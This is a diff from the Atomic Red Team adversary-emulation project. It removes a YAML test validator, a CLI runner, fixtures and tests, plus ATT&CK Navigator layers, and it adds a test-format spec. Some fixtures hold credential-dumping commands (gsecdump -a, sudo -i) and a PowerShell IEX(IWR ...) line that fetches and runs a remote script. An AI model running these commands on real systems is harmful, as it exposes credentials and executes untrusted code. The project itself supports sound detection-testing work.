for d in value.get("dependencies") or []:
commands.extend([d.get_prereq_command, d.prereq_command])
return extract_mustached_keys(commands)
@field_validator("dependency_executor_name", mode="before") # noqa
@classmethod
def validate_dep_executor(cls, v, info: ValidationInfo):
if v is None:
raise PydanticCustomError(
"empty_dependency_executor_name",
"'dependency_executor_name' shouldn't be empty. Provide a valid value ['manual','powershell', 'sh', "
"'bash', 'command_prompt'] or remove the key from YAML",
{"loc": ["dependency_executor_name"], "input": None},
)
return v
@model_validator(mode="after")
def validate_elevation_required(self):
if (
("linux" in self.supported_platforms or "macos" in self.supported_platforms)
and not self.executor.elevation_required
and isinstance(self.executor, CommandExecutor)
):
commands = [self.executor.command]
if self.executor.cleanup_command:
commands.append(self.executor.cleanup_command)
if any(["sudo" in cmd for cmd in commands]):
raise PydanticCustomError(
"elevation_required_but_not_provided",
"'elevation_required' shouldn't be empty/false. Since `sudo` is used, set `elevation_required` to true`",
{
"loc": ["executor", "elevation_required"],
"input": self.executor.elevation_required,
},
)
return self
@field_validator("input_arguments", mode="before") # noqa
@classmethod
def validate(cls, v, info: ValidationInfo):
if v is None:
raise PydanticCustomError(
"empty_input_arguments",
"'input_arguments' shouldn't be empty. Provide a valid value or remove the key from YAML",
{"loc": ["input_arguments"], "input": None},
)
atomic = info.data
keys = cls.extract_mustached_keys(atomic)
for key, _value in v.items():
if key not in keys:
raise PydanticCustomError(
"unused_input_argument",
f"'{key}' is not used in any of the commands",
{"loc": ["input_arguments", key], "input": key},
)
else:
keys.remove(key)
if len(keys) > 0:
for x in keys:
raise PydanticCustomError(
"missing_input_argument",
f"{x} is not defined in input_arguments",
{"loc": ["input_arguments"]},
)
return v
class Technique(BaseModel):
attack_technique: AttackTechniqueID
display_name: str = Field(..., min_length=5)
atomic_tests: List[Atomic] = Field(min_length=1)
def model_post_init(self, __context) -> None:
for index in range(len(self.atomic_tests)):
test_number = f"{self.attack_technique}-{index + 1}"
self.atomic_tests[index].test_number = test_number
atomic_red_team/runner.py
-111
View File
@@ -1,111 +0,0 @@
import glob
import json
import os
import sys
import urllib.parse
from collections import defaultdict
from functools import partial
from typing import Annotated
import typer
from pydantic import ValidationError
from atomic_red_team.common import used_guids_file, atomics_path
from atomic_red_team.guid import (
generate_guids_for_yaml,
get_unique_guid,
)
from atomic_red_team.labels import GithubAPI
from atomic_red_team.models import Technique
from atomic_red_team.validator import Validator, format_validation_error, yaml
app = typer.Typer(help="Atomic Red Team Maintenance tool CLI helper")
@app.command()
def generate_guids():
"""Generates missing GUIDs for the atomic files"""
with open(used_guids_file, "r") as file:
used_guids = file.readlines()
for file in glob.glob(f"{atomics_path}/T*/T*.yaml"):
generate_guids_for_yaml(file, partial(get_unique_guid, guids=used_guids))
@app.command()
def generate_schemas():
"""Generates JSON and YAML schemas for techniques"""
schema = Technique.model_json_schema() # (1)!
with open("schema.yaml", "w") as f:
yaml.default_flow_style = False
yaml.dump(schema, f)
with open("schema.json", "w") as f:
f.write(json.dumps(schema, indent=2))
@app.command()
def generate_counter():
"""Generate atomic tests count svg"""
test_count = 0
for file in glob.glob(f"{atomics_path}/T*/T*.yaml"):
with open(file, "r") as f:
yaml_data = yaml.load(f)
if yaml_data is not None and "atomic_tests" in yaml_data:
test_count += len(yaml_data["atomic_tests"])
# Generate the shields.io badge URL
params = {"label": "Atomics", "message": str(test_count), "style": "flat"}
url = "https://img.shields.io/badge/{}-{}-{}.svg".format(
urllib.parse.quote_plus(params["label"]),
urllib.parse.quote_plus(params["message"]),
urllib.parse.quote_plus(params["style"]),
)
# Save shields URL in GitHub Output to be used in the next step.
with open(os.environ["GITHUB_OUTPUT"], "a") as fh:
print(f"result={url}", file=fh)
@app.command()
def generate_labels(
pull_request: Annotated[str, typer.Option("--pr")],
token: Annotated[str, typer.Option("--token")],
):
"""Generate labels for a pull request."""
api = GithubAPI(token)
api.save_labels_and_maintainers(pull_request)
@app.command()
def validate():
"""
Validate all the atomic techniques in a directory.
"""
validator = Validator()
errors = defaultdict(list)
for folder in glob.glob(f"{atomics_path}/T*"):
for item in os.scandir(folder):
try:
validator.validate(item)
except ValidationError as error:
errors[item.path].append(error)
if len(errors) == 0:
print("Validation successful")
else:
print("Validation failed")
for i, errors in errors.items():
print(f"Error occurred with {i.replace(f'{atomics_path}/', '')}.")
print("Each of the following are why it failed:")
for error in errors:
if isinstance(error, ValidationError):
for k, v in format_validation_error(error).items():
print(f"\n\tInvalid {'.'.join(map(str, v))}: {k}\n")
else:
print(f"\n\t{error}\n")
sys.exit(1)
if __name__ == "__main__":
app()
atomic_red_team/spec.yaml
+195
View File
@@ -0,0 +1,195 @@
#
# This spec describes the format of Atomic Red Team atomic tests that are defined in YAML format.
#
# The directory structure is:
# - These tests reside in the `atomics` directory
# - One directory per ATT&CK technique, named "T1234"
# - All the atomic tests for a technique in a file called "T1234.yaml" inside that directory
# - Any payloads, supporting materials, etc for the atomic tests also live in that directory
#
# For example:
#
# atomic_red_team/
# atomic_red_team/atomics
# atomic_red_team/atomics/T1234
# atomic_red_team/atomics/T1234/T1234.yaml <-- this is where all the atomic tests live
# atomic_red_team/atomics/T1234/src/payload1.sct <-- a payload file needed by one of the T1234 atomics (human readable)
# atomic_red_team/atomics/T1234/bin/payload2.dll <-- another payload file needed by one of the T1234 atomics (binary)
#
# In general, a set of atomic tests for a technique should never depend on payloads
# or supporting files from other atomic directories. We want to keep things nice and close.
# Use git symlinks if you really need to share files between techniques.
#
# Atomic tests should be fully automated whenever possible, requiring no continued interaction.
# Include any needed options to execute the commands seamlessly, for example SysInternal's -accepteula option or any -q or -quiet modes.
#
# To validate your atomics, run `bin/validate_atomics.rb`
---
attack_technique: TXXXX # (with a capital T, Example: 'T1123')
display_name: Name of the technique as defined by ATT&CK. # Example: 'Audio Capture'
# `atomic_tests` is an array of distinct test cases inside this technique. A test case should
# include ALL of the information needed to run that test (ie, this is the "atomic" - you don't
# distribute steps across different atomics)
# Each of these tests is a YAML array element (starts with a `-`).
atomic_tests:
#
# This is the first atomic test
#
- name: Short name of the test that titles how it tests the technique. # Example: "SourceRecorder via cmd.exe"
auto_generated_guid: # This key and/or it's value will be added by the CI build after submitting a Pull Request
description: |
Long form description of the test. Markdown is supported so you can **bold** items, create
- one list
- two list
- red list
- [blue list](https://google.com)
# supported platforms is an array of the OS/platforms this atomic test can be run upon. Values include:
# - windows
# - macos
# - linux
supported_platforms:
- windows
# inputs to the atomic test that are required to run the test (think of these like function arguments).
# This is a hash where the key is the input name, value is a hash defining the input argument.
input_arguments:
# this is the first input argument, called "output_file"
output_file:
# Short description of the input argument
description: xxxxx
# data type of the input. Possible values could include:
# - Path (a file path)
# - Url (a URL)
# - String
# - Integer
# - Float
# - really anything else you'd like, but add it to this list
type: Path
# default value for this argument that will be used if one is not specifid
default: test.wma
# this is a example of a second argument
malware_payload_url:
description: xxxxx
type: Url
default: 0000:00:30
dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
dependencies: # (optional)
# a list of dependies that must be met to successfully run this atomic
- description: |
TODO
prereq_command: | # commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
TODO
get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
TODO
#example of two dependencies
dependencies:
- description: |
Sysmon executable must be available
prereq_command: |
where sysmon > nul
get_prereq_command: |
echo Automated installer not implemented yet, please install Sysmon manually
- description: |
Sysmon must be installed
prereq_command: |
sc query sysmon > nul
get_prereq_command: |
sysmon -i -accepteula
# a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these
# per test, but there are cases where you may have multiple - for example, separate executors for `sh`
# and `bash` when working on linux OSes.
executors:
# the name of the executor describes the framework or application in which the test should be executed.
#
# Each of these executors will have options that the executor needs to run. Possible executors we've imagined
# at this time and their required options include:
#
# - `command_prompt` : The Windows Command Prompt, aka cmd.exe
# Requires the "command" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: command_prompt
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `powershell` : Powershell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: powershell
# command: |
# Write-Debug "attack starting"
# Write-Debug "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `sh` : Linux's bourne shell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: sh
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `bash` : Linux's bourne again shell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: bash
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `manual` : a list of manual steps to run. This should only be used when required, for example when GUI steps are involved that
# cannot be automated.
#
# Requires the `steps` option that tells the user what to do to invoke the test. This is a
# multi-line list of instructions (also preprocessed)
#
# Example:
# - name: manual
# steps: |
# 1. Navigate to [chrome://extensions](chrome://extensions) and
# tick 'Developer Mode'.
#
# 2. Click 'Load unpacked extension...' and navigate to
# [Browser_Extension](../T1176/)
#
# 3. Click the '#{FOOBAR}' button - you can interpolate here too!
#
- name: command_prompt
elevation_required: true
# indicates whether command must be run with admin privileges.
#If the elevation_required attribute is not defined, the value is assumed to be false
command: |
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
#
# This is the second atomic test
#
- name: Echo to the screen
description: |
blah blah blah
supported_platforms:
- macos
- linux
# in this example we have no input arguments
input_arguments:
executors:
- name: bash
command: echo "Hello world!"
atomic_red_team/test_data/elevation_required_but_not_provided.yaml
-13
View File
@@ -1,13 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Root login
auto_generated_guid:
description: |
Login as root.
supported_platforms:
- linux
executor:
command: |
sudo -i
name: bash
atomic_red_team/test_data/empty_dependency_executor_name.yaml
-20
View File
@@ -1,20 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid:
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
dependency_executor_name:
atomic_red_team/test_data/empty_input_arguments.yaml
-15
View File
@@ -1,15 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid:
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
atomic_red_team/test_data/float_type.yaml
-18
View File
@@ -1,18 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: float
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
atomic_red_team/test_data/int_parsing.yaml
-18
View File
@@ -1,18 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: integer
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
atomic_red_team/test_data/invalid_directory/.gitkeep
View File
atomic_red_team/test_data/invalid_filename.yml
-39
View File
@@ -1,39 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
gsecdump_bin_hash:
description: File hash of the Gsecdump binary file
type: string
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
gsecdump_url:
description: Path to download Gsecdump binary file
type: url
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
dependency_executor_name: powershell
dependencies:
- description: |
Gsecdump must exist on disk at specified location (#{gsecdump_exe})
prereq_command: |
if (Test-Path "#{gsecdump_exe}") {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
Move-Item $binpath "#{gsecdump_exe}"
}
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
atomic_red_team/test_data/missing_input_argument.yaml
-13
View File
@@ -1,13 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
atomic_red_team/test_data/reused_guid.yaml
-35
View File
@@ -1,35 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
dependency_executor_name: powershell
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
atomic_red_team/test_data/string_pattern_mismatch.yaml
-13
View File
@@ -1,13 +0,0 @@
attack_technique: W1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
executor:
command: |
echo "ART"
name: command_prompt
atomic_red_team/test_data/string_too_short.yaml
-18
View File
@@ -1,18 +0,0 @@
attack_technique: T1003
display_name: OS
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
atomic_red_team/test_data/unused_input_argument.yaml
-27
View File
@@ -1,27 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
gsecdump_bin_hash:
description: File hash of the Gsecdump binary file
type: string
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
gsecdump_url:
description: Path to download Gsecdump binary file
type: url
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
dependency_executor_name: powershell
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
atomic_red_team/test_data/url_parsing.yaml
-18
View File
@@ -1,18 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: url
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
atomic_red_team/tests/__init__.py
View File
atomic_red_team/tests/test_models.py
-124
View File
@@ -1,124 +0,0 @@
from hypothesis import given, strategies as st, settings, HealthCheck
from hypothesis.provisional import urls
from pydantic import AnyUrl
from pydantic.networks import IPvAnyAddress
from atomic_red_team.models import (
Technique,
Atomic,
StringArg,
IntArg,
FloatArg,
UrlArg,
ManualExecutor,
Platform,
CommandExecutor,
ExecutorType,
)
executor_strategy = st.sampled_from(["powershell", "bash", "sh", "command_prompt"])
st.register_type_strategy(IPvAnyAddress, st.ip_addresses())
st.register_type_strategy(AnyUrl, urls())
alphanumeric_underscore_strategy = st.text(
alphabet=st.sampled_from(
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
),
min_size=4,
)
input_args_types = [
st.builds(
StringArg,
description=st.text(),
default=st.text(),
type=st.sampled_from(["string", "path", "String", "Path"]),
),
st.builds(
IntArg,
description=st.text(),
default=st.integers(),
type=st.sampled_from(["integer", "Integer"]),
),
st.builds(
FloatArg,
description=st.text(),
default=st.floats(),
type=st.sampled_from(["float", "Float"]),
),
st.builds(
UrlArg,
description=st.text(),
default=st.one_of(urls(), st.ip_addresses()),
type=st.sampled_from(["url", "Url"]),
),
]
platforms_strategy = st.lists(st.sampled_from(list(Platform.__args__)), min_size=1)
input_arguments_strategy = st.dictionaries(
keys=alphanumeric_underscore_strategy, values=st.one_of(*input_args_types)
)
atomics_strategy = dict(
input_arguments=input_arguments_strategy,
name=alphanumeric_underscore_strategy,
description=st.text(min_size=5),
supported_platforms=platforms_strategy,
)
def atomic_manual_executor_builder():
def build_atomic(input_arguments, **kwargs):
formatted_args = " ".join(
[f"echo #{key}=#{{{key}}}" for key in input_arguments.keys()]
)
return Atomic(
**kwargs,
executor=ManualExecutor(
name="manual", steps=f"{formatted_args} Custom steps here..."
),
input_arguments=input_arguments,
)
return st.builds(build_atomic, **atomics_strategy)
def atomic_command_executor_builder():
def build_atomic(input_arguments, executor_name, **kwargs):
formatted_args = " ".join(
[f"echo #{key}=#{{{key}}}" for key in input_arguments.keys()]
)
return Atomic(
executor=CommandExecutor(
name=executor_name,
command=f"{formatted_args} Custom steps here...",
),
input_arguments=input_arguments,
**kwargs,
)
return st.builds(build_atomic, executor_name=executor_strategy, **atomics_strategy)
@given(
st.builds(
Technique,
attack_technique=st.integers(min_value=1000, max_value=9999).map(
lambda x: f"T{x}"
),
atomic_tests=st.lists(
st.one_of(
atomic_manual_executor_builder(), atomic_command_executor_builder()
),
min_size=1,
),
)
)
@settings(max_examples=500, suppress_health_check=[HealthCheck.too_slow])
def test_property(instance):
assert isinstance(instance, Technique)
assert len(instance.attack_technique) > 4
assert len(instance.display_name) >= 5
for test in instance.atomic_tests:
assert isinstance(test, Atomic)
assert test.executor.name in ExecutorType.__args__
atomic_red_team/tests/test_validate.py
-20
View File
@@ -1,20 +0,0 @@
import os
from os.path import dirname, realpath
from pathlib import Path
import pytest
from pydantic import ValidationError
from atomic_red_team.validator import Validator
test_data_path = f"{dirname(dirname(realpath(__file__)))}/test_data"
@pytest.mark.parametrize("test_input", list(os.scandir(test_data_path)))
def test_all_invalid_scenarios(test_input):
validator = Validator()
with pytest.raises(ValidationError) as exc_info:
validator.validate(test_input)
error_types = [e["type"] for e in exc_info.value.errors()]
assert Path(test_input).stem in error_types
atomic_red_team/validator.py
-117
View File
@@ -1,117 +0,0 @@
import collections
import fnmatch
from os import DirEntry
from pydantic import ValidationError
from pydantic_core import InitErrorDetails, PydanticCustomError
from ruamel.yaml import YAML
from atomic_red_team.common import atomics_path
from atomic_red_team.models import Technique
yaml = YAML(typ="safe")
def format_validation_error(error: ValidationError):
if len(error.errors()) == 1:
err = error.errors()[0]
message = ""
if err["type"] == "elevation_required_but_not_provided":
return {err["msg"]: list(err.get("loc")) + err.get("ctx").get("loc")}
if err["input"] and err["type"] != "unused_input_argument":
message += f"{err['input']} - "
return {message + err["msg"]: err.get("loc")}
inputs = collections.defaultdict(set)
for e in error.errors():
if e["type"] == "elevation_required_but_not_provided":
return {e["msg"]: e.get("loc") + e.get("ctx").get("loc")}
# If it's a union type, then it generates multiple errors for the same input arguments.
# Here we collect only the common paths. For example,
# [( input_arguments, url_parsing),(input_arguments, string_mismatch)] => (input_arguments)
if len(inputs[e["input"]]) == 0:
inputs[e["input"]] = e.get("loc", tuple())
else:
inputs[e["input"]] = tuple(
[x for x in inputs[e["input"]] if x in e.get("loc", tuple())]
)
return dict(inputs)
class Validator:
def __init__(self):
used_guids_path = f"{atomics_path}/used_guids.txt"
with open(used_guids_path, "r") as f:
self.used_guids = [x.strip() for x in f.readlines()]
self.guids = []
def validate(self, obj: DirEntry):
if obj.is_file():
if fnmatch.fnmatch(obj.name, "*.y*ml"):
self.validate_file(obj)
if obj.is_dir():
self.validate_directory(obj)
def validate_file(self, file: DirEntry):
"""Performs file validation"""
self.validate_yaml_extension(file)
self.validate_atomic(file)
def validate_atomic(self, file: DirEntry):
"""Validates whether the defined input args are used."""
with open(file.path, "r") as f:
atomic = yaml.load(f)
technique = Technique(**atomic)
for index, t in enumerate(technique.atomic_tests):
if t.auto_generated_guid:
if t.auto_generated_guid not in self.guids:
self.guids.append(t.auto_generated_guid)
else:
raise ValidationError.from_exception_data(
"ValueError",
[
InitErrorDetails(
type=PydanticCustomError(
"reused_guid",
f"GUID {t.auto_generated_guid} reused for test {t.name}. GUIDs are auto generated. You can remove atomic_tests[{index}].auto_generated_guid",
),
loc=("atomic_tests", index, "auto_generated_guid"),
input=t.auto_generated_guid,
)
],
)
def validate_yaml_extension(self, file: DirEntry):
"""Validates the yaml extension"""
if fnmatch.fnmatch(file.path, "*.yml"):
raise ValidationError.from_exception_data(
"ValueError",
[
InitErrorDetails(
type=PydanticCustomError(
"invalid_filename",
"Rename file from .yml to .yaml",
),
loc=["filename"],
)
],
)
def validate_directory(self, directory: DirEntry):
"""Performs directory validation"""
self.validate_directory_path(directory)
def validate_directory_path(self, directory: DirEntry):
"""Validated whether the directory is allowed directory name (`src` or `bin`)"""
if directory.name not in ["src", "bin"]:
raise ValidationError.from_exception_data(
"ValueError",
[
InitErrorDetails(
type=PydanticCustomError(
"invalid_directory",
"Invalid path. `src` and `bin` are the only two directories supported.",
),
loc=["directory"],
)
],
)
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Containers)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into 